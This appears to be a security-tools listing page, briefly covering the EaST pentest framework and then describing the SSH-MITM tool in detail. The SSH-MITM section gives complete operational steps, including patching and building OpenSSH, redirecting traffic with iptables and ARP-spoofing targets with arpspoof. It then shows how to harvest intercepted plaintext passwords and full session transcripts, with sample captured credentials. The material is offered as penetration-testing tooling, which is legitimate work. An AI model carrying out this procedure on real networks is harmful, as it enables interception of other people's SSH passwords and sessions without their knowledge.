  • Full capacity of a vanilla pentest framework. In spite of its simplicity and "unoverload", the framework has all the resources needed to run a wide range of exploits, from web to buffer overruns.
  • Wide enhancement possibilities. Third-party developers can create their own open source solutions or participate in EAST development using the server-client architecture, the message traffic API and the support libraries.

2. Requirements

  • Python 2

3. Usage

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py [-p PORT] [--all-interfaces]

Download EAST

SSH Man-In-The-Middle Penetration Testing Tool



This penetration testing tool allows an auditor to intercept SSH connections. 


A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and sessions are logged to disk.

Of course, the victim's SSH client will complain that the server's key has changed. But because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc.), many or most users will disregard the warning and continue on.

NOTE: Only run the modified sshd in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. It's not hard to imagine these edits introduce serious vulnerabilities. Until the dependency on root privileges is removed, be sure to only run this code on throw-away VMs/containers.

To Do

This is the first release of this tool. While it is very useful as-is, there are nevertheless things to improve:

  • Support SFTP MITM'ing.
  • Add port forwarding support.
  • Remove dependency on root privileges.
  • Create wrapper script that detects when user is trying to use key authentication only, and de-spoof them automatically.

Initial Setup

1.) Install zlib and openssl headers:
sudo apt install zlib1g-dev libssl-dev

2.) Download OpenSSH v7.5p1 and verify its signature:
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg --import RELEASE_KEY.asc
gpg --verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz

3.) Unpack the tarball, patch the sources, and compile it:
tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure --with-sandbox=no && make -j 10

4.) Create keys and setup environment:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/

Running The Attack


1.) Run sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config

2.) Enable IP forwarding:
sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -P FORWARD ACCEPT

3.) Allow connections to sshd and re-route forwarded SSH connections:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22

4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won't likely be able to handle an entire network's traffic all at once. Only spoof a couple IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5

5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log

6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.

Sample Results

Upon success, /var/log/auth.log will have lines that log the password, like this:

May 16 23:14:01 showmeyourmoves sshd[16798]: INTERCEPTED PASSWORD: hostname: [10.199.30.x]; username: [jdog]; password: [supercalifragilistic] [preauth]

Furthermore, the victim's entire SSH session can be found in /home/bogus/session_*.txt:

# cat /home/bogus/session_0.txt
Last login: Tue May 16 21:35:00 2017 from 10.50.22.x
OpenBSD 6.0-stable (GENERIC.MP) #12: Sat May  6 19:08:31 EDT 2017

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest version of the code.  With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

jdog@jefferson ~ $ ppss
PID TT  STAT       TIME COMMAND
59264 p0  Ss      0:00.02 -bash (bash)
52132 p0  R+p     0:00.00 ps
jdog@jefferson ~ $ iidd
uid=1000(jdog) gid=1000(jdog) groups=1000(jdog), 0(wheel)
jdog@jefferson ~ $ sssshh  jjtteessttaa@@mmaaggiiccbbooxx
jtesta@magicbox's password: ROFLC0PTER!!1juan

Note that the characters in the user's commands appear twice in the file because the input from the user is recorded, as well as the output from the shell (which echoes characters back). Observe that when programs like sudo and ssh temporarily disable echoing in order to read a password, duplicate characters are not logged.

Download SSH-MITM
